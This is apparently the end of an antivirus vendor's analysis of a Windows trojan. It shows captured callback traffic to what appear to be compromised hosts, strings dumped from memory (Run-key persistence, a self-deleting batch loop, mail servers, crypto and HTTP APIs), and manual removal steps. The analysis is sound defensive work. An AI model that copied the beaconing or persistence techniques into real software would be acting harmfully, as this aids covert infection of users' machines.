Server: Apache
Location: hXXp://VVV.qistech.com/
Content-Length: 207
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>
<head>.<title>302 Found</title>.</head><body
>.<h1>Found</h1>.<p>The document has moved <a
href="hXXp://VVV.qistech.com/">here</a>.</p>.</body>
</html>...


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 52
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: benefits-inc.com
Connection: Keep-Alive
Cache-Control: no-cache

j*/2 ..3.S.4..Y6B}.7..!9...:d;.;..K=.d.>...@<.vA.".B
HTTP/1.1 500 Internal Server Error
Date: Sat, 12 Apr 2014 14:42:04 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 251
Connection: keep-alive
Keep-Alive: timeout=30
Server: Apache/2
X-Powered-By: PHP/5.2.17
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
<!DOCTYPE html>.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">
.<head>.<meta http-equiv="Content-Type" content="text/html;
charset=utf-8" />..<title>Database Error</title>..</
head>.<body>..<h1>Error establishing a database connect
ion</h1>.</body>.</html>...


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 512
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: hostphd.com.br
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Sat, 12 Apr 2014 14:40:26 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
Last-Modified: Sun, 23 Mar 2014 15:46:09 GMT
Content-Type: text/html
Content-Length: 24609

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 558
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: justconnect.co.za
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 301 Moved Permanently
Server: nginx/1.1.19
Date: Sat, 12 Apr 2014 14:40:16 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: hXXp://VVV.justconnect.co.za/
<html>..<head><title>301 Moved Permanently</title
></head>..<body bgcolor="white">..<center><h1>
301 Moved Permanently</h1></center>..<hr><cent
er>nginx/1.1.19</center>..</body>..</html>....


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 508
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: cgc-england.com
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Sat, 12 Apr 2014 14:40:16 GMT
Server: Apache
Last-Modified: Fri, 17 Jan 2014 11:51:26 GMT
Accept-Ranges: bytes
Content-Length: 13968
Keep-Alive: timeout=2, max=90
Connection: Keep-Alive
Content-Type: text/html
Content-Language: fr

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 254
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: tsu-box.com
Connection: Keep-Alive
Cache-Control: no-cache

........!`..2. .C.6.T}K.e.`.v;v......_...$.......H-...B...X.%fm.6...G$..e....H.......l ...N..*K...`....N.....'..6...08.Vs...i.(.......m..r.......0.......
.%.9.6.N.G>d.X.y.i...z[...........x...=....B..aW...l.. 
:..KD..\...m...~a...&5...J..Jy..........g
HTTP/1.1 500 Internal Server Error
Date: Sat, 12 Apr 2014 14:42:12 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 12 Apr 2014 14:42:13 GMT
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
3a..<!DOCTYPE html>.<html xmlns="hXXp://VVV.w3.org/1999/xhtml
"..57..>.<head>.<meta http-equiv="Content-Type" content="t
ext/html; charset=utf-8" />..<title>..1b.....................
..........1e..</title>..</head>.<body>..<h1>..
27...........................................16..</h1>.</body
>.</html>...0..


GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.biurimex.pl
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 3966
Content-Type: text/html
Date: Sat, 12 Apr 2014 14:42:04 GMT
Last-Modified: Fri, 26 Jul 2013 10:07:38 GMT
Server: IdeaWebServer/v0.80

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 562
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: icigrain.com
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 301 Moved Permanently
Date: Sat, 12 Apr 2014 14:40:46 GMT
Server: LiteSpeed
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
X-Powered-By: PHP/5.4.22
Set-Cookie: PHPSESSID=16cee3056eb3b31f92edc74b47b72b7f; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: hXXp://VVV.icigrain.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Location: hXXp://VVV.icigrain.com/
Content-Length: 0


JRY7B2.tmp_3796:

.text
`.rdata
.rsrc
9m,.spLoadImageA
R:\jfndh8883.dat
user32.dll
kernel32.dll
gdi32.dll
zxc098iuser32.dll
%,'gdi32.dll
[t.Kx
WG.OK
.hM-n
&n%cv|n
q*.AglS
x;P.IB
.sd~'\B4W
&sourly
thoughts compass
&Passion search
&Leahy's unascertained
&windows
pillars halted trying certainly
sports
&report located
&ports
&Alderman KEYES
4,1,4,24
welled.exe

JRY7B2.tmp_3796_rwx_04000000_0000F000:

.text
`.rdata
@.data
.reloc
software\microsoft\windows\currentversion\run
%s\%s.exe
Content-Length: %d
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
\system32\svchost.exe
software\microsoft\windows\currentversion
del %s
if exist %s goto :repeat
http://%s
kernel32.dll
smtp.compuserve.com
mail.airmail.net
smtp.directcon.net
smtp.sbcglobal.yahoo.com
smtp.mail.yahoo.com
smtp.live.com
CRYPT32.dll
PSAPI.DLL
USERENV.dll
IPHLPAPI.DLL
HttpQueryInfoA
HttpSendRequestA
HttpAddRequestHeadersA
HttpOpenRequestA
InternetCrackUrlA
WININET.dll
WS2_32.dll
SHLWAPI.dll
GetProcessHeap
KERNEL32.dll
USER32.dll
RegCloseKey
RegOpenKeyExA
CryptImportKey
CryptDestroyKey
CryptExportKey
CryptGenKey
ADVAPI32.dll
ole32.dll
http://%s/
InternetOpenUrlA
zc)%c
-9276543007814
%Documents and Settings%\%current user%\sufkywiddeax.exe
53595`5}5
9-9K9}9
?$?(?,?0?4?

JRY7B2.tmp_3796_rwx_08900000_00012000:

.text7d/
~.rdata
.Lv~EF4)
.text
`.rdata
@.data
.reloc
software\microsoft\windows\currentversion\run
%s\%s.exe
Content-Length: %d
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
\system32\svchost.exe
software\microsoft\windows\currentversion
del %s
if exist %s goto :repeat
http://%s
kernel32.dll
smtp.compuserve.com
mail.airmail.net
smtp.directcon.net
smtp.sbcglobal.yahoo.com
smtp.mail.yahoo.com
smtp.live.com
CRYPT32.dll
PSAPI.DLL
USERENV.dll
IPHLPAPI.DLL
HttpQueryInfoA
HttpSendRequestA
HttpAddRequestHeadersA
HttpOpenRequestA
InternetCrackUrlA
WININET.dll
WS2_32.dll
SHLWAPI.dll
GetProcessHeap
KERNEL32.dll
USER32.dll
RegCloseKey
RegOpenKeyExA
CryptImportKey
CryptDestroyKey
CryptExportKey
CryptGenKey
ADVAPI32.dll
ole32.dll
http://%s/
InternetOpenUrlA
zc)%c
-9276543007814
53595`5}5
9-9K9}9
?$?(?,?0?4?
@.reloc
@595`5}5
-9K9}
KERNEL32.DLL

svchost.exe_1876:

.text
`.data
iphlpapi.dll
inetcomm.dll
operator
KERNEL32.DLL
kernel32.dll
mscoree.dll
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
GetProcessWindowStation
USER32.DLL
EX8^/u$9^%u
RegCloseKey
RegOpenKeyExA
ADVAPI32.dll
SHLWAPI.dll
WS2_32.dll
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
WININET.dll
GetProcessHeap
KERNEL32.dll
USER32.dll
DNSAPI.dll
GdiplusShutdown
gdiplus.dll
GDI32.dll
ole32.dll
ShellExecuteA
SHELL32.dll
GetCPInfo
J<_T.
f%fR9
Z;3*/Z%x
&EL.Gb
!"7'$%6:)* ,-./02345&(#>;=?98< 1
%System%\regedit.exe
220 Mail.Ru ESMTP
220 mx.google.com ESMTP x4si4153195bkn.47 - gsmtp
220 mx.google.com ESMTP h61si4680323qgf.97 - gsmtp
220 mx4.messagingengine.com ESMTP . No UCE permitted.

svchost.exe_2960:

.text
`.data
iphlpapi.dll
inetcomm.dll
operator
KERNEL32.DLL
kernel32.dll
mscoree.dll
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
GetProcessWindowStation
USER32.DLL
EX8^/u$9^%u
RegCloseKey
RegOpenKeyExA
ADVAPI32.dll
SHLWAPI.dll
WS2_32.dll
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
WININET.dll
GetProcessHeap
KERNEL32.dll
USER32.dll
DNSAPI.dll
GdiplusShutdown
gdiplus.dll
GDI32.dll
ole32.dll
ShellExecuteA
SHELL32.dll
GetCPInfo
?
|G9Y
Vc!.UY
3>&< 0&.;
-i0}|
|.Xi/
!"7'$%6:)* ,-./02345&(#>;=?98< 1
mas.lavasoft.com
%System%\regedit.exe
[184.107.38.38]
220 Mail.Ru ESMTP
220 mx.google.com ESMTP qr7si4151843bkb.78 - gsmtp
220 mx.google.com ESMTP n1si4644252qcr.19 - gsmtp
220 mx4.messagingengine.com ESMTP . No UCE permitted.

svchost.exe_1876_rwx_04000000_00008000:

.text
`.rdata
@.data
.reloc
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: %d
http://%s/
HttpSendRequestA
HttpAddRequestHeadersA
HttpOpenRequestA
InternetCrackUrlA
HttpQueryInfoA
InternetOpenUrlA
WININET.dll
WS2_32.dll
SHLWAPI.dll
KERNEL32.dll
USER32.dll
ole32.dll
zc)%c

svchost.exe_1876_rwx_13140000_01550000:

.text
`.data
iphlpapi.dll
inetcomm.dll
operator
KERNEL32.DLL
kernel32.dll
mscoree.dll
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
GetProcessWindowStation
USER32.DLL
EX8^/u$9^%u
RegCloseKey
RegOpenKeyExA
ADVAPI32.dll
SHLWAPI.dll
WS2_32.dll
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
WININET.dll
GetProcessHeap
KERNEL32.dll
USER32.dll
DNSAPI.dll
GdiplusShutdown
gdiplus.dll
GDI32.dll
ole32.dll
ShellExecuteA
SHELL32.dll
GetCPInfo
J<_T.
f%fR9
Z;3*/Z%x
&EL.Gb
!"7'$%6:)* ,-./02345&(#>;=?98< 1
%System%\regedit.exe
220 Mail.Ru ESMTP
220 mx.google.com ESMTP x4si4153195bkn.47 - gsmtp
220 mx.google.com ESMTP h61si4680323qgf.97 - gsmtp
220 mx4.messagingengine.com ESMTP . No UCE permitted.

svchost.exe_2960_rwx_04000000_00008000:

.text
`.rdata
@.data
.reloc
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: %d
http://%s/
HttpSendRequestA
HttpAddRequestHeadersA
HttpOpenRequestA
InternetCrackUrlA
HttpQueryInfoA
InternetOpenUrlA
WININET.dll
WS2_32.dll
SHLWAPI.dll
KERNEL32.dll
USER32.dll
ole32.dll
zc)%c

svchost.exe_2960_rwx_13140000_01550000:

.text
`.data
iphlpapi.dll
inetcomm.dll
operator
KERNEL32.DLL
kernel32.dll
mscoree.dll
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
GetProcessWindowStation
USER32.DLL
EX8^/u$9^%u
RegCloseKey
RegOpenKeyExA
ADVAPI32.dll
SHLWAPI.dll
WS2_32.dll
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
WININET.dll
GetProcessHeap
KERNEL32.dll
USER32.dll
DNSAPI.dll
GdiplusShutdown
gdiplus.dll
GDI32.dll
ole32.dll
ShellExecuteA
SHELL32.dll
GetCPInfo
?
|G9Y
Vc!.UY
3>&< 0&.;
-i0}|
|.Xi/
!"7'$%6:)* ,-./02345&(#>;=?98< 1
mas.lavasoft.com
%System%\regedit.exe
[184.107.38.38]
220 Mail.Ru ESMTP
220 mx.google.com ESMTP qr7si4151843bkb.78 - gsmtp
220 mx.google.com ESMTP n1si4644252qcr.19 - gsmtp
220 mx4.messagingengine.com ESMTP . No UCE permitted.


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:1880

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\detanses[1].htm (118 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\index[1].htm (18 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\teknorhino[1].htm (15 bytes)
    %Documents and Settings%\%current user%\zygyspypjysl.exe (48 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\cgc-england[1].htm (13 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@screaminpeach[1].txt (233 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@bigjohnsbeefjerky[1].txt (241 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\safetyconnection[1].htm (13 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\sortedorganizing[1].htm (4 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@plus[1].txt (214 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\hostphd.com[1].htm (24 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\JRY7B2.tmp (62 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1844237615-1960408961-1801674531-1003\c5b88721db08c824db69d0bbc702beb8_75ed9567-aa58-4c8e-a8ea-3cad7c47ab03 (881 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@genmar.gen[1].txt (225 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@altonhousehotel[1].txt (237 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@traderush[1].txt (270 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\biurimex[1].htm (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\lucion[1].htm (14 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@shipeliteexpress[1].txt (239 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@stepnet[1].txt (219 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\combine.or[1].htm (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\etcycles[1].htm (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\slf6E4C.tmp.bat (123 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (10020 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@tavdi[1].txt (217 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\suspendedpage[1].htm (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\empordalia[1].htm (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\slcago[1].htm (400 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\churchclothes[1].htm (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\combine.or[1].htm (1 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@bigtopmultimedia[1].txt (239 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@sdlp[1].txt (214 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\sydney[1].htm (357 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@taykon[1].txt (219 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@istanbultarim.com[1].txt (239 bytes)
    %Documents and Settings%\%current user%\sufkywiddeax.exe (62 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\empordalia[1].htm (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tar4.tmp (2712 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (54 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@racknstackwarehouse.com[1].txt (251 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\aciuba.com[1].htm (73 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Cab3.tmp (49 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@wsipowerontheweb[1].txt (239 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\lucion[1].htm (14 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@theautospas[1].txt (230 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (408 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tar6.tmp (2712 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Cab1.tmp (49 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@starmedia[1].txt (223 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\easyformations[1].htm (19 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@goodvaluecenter[1].txt (237 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@neurotoxininstitute[1].txt (246 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\detanses[1].htm (197 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@cbsprinting.com[1].txt (235 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\solutioncorp[1].htm (3888 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\brijindia[1].htm (28 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@golfpark-moossee[1].txt (281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\etcycles[1].htm (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\sarpy[1].htm (20 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@teasing-video[1].txt (233 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@paintball[1].txt (152 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\authentica-travel[1].htm (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\403[1].htm (883 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\mibsga[1].htm (619 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\bigtopmultimedia[1].htm (861 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tar2.tmp (2712 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\etcycles[1].htm (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Cab5.tmp (54 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@telenavis[1].txt (225 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@doctsf[1].txt (150 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\lockerlookz[1].htm (29 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@westhillsstl[1].txt (232 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@ctr4process[2].txt (230 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\lexjuridica[1].htm (3 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "zygyspypjysl" = "%Documents and Settings%\%current user%\zygyspypjysl.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "sufkywiddeax" = "%Documents and Settings%\%current user%\sufkywiddeax.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
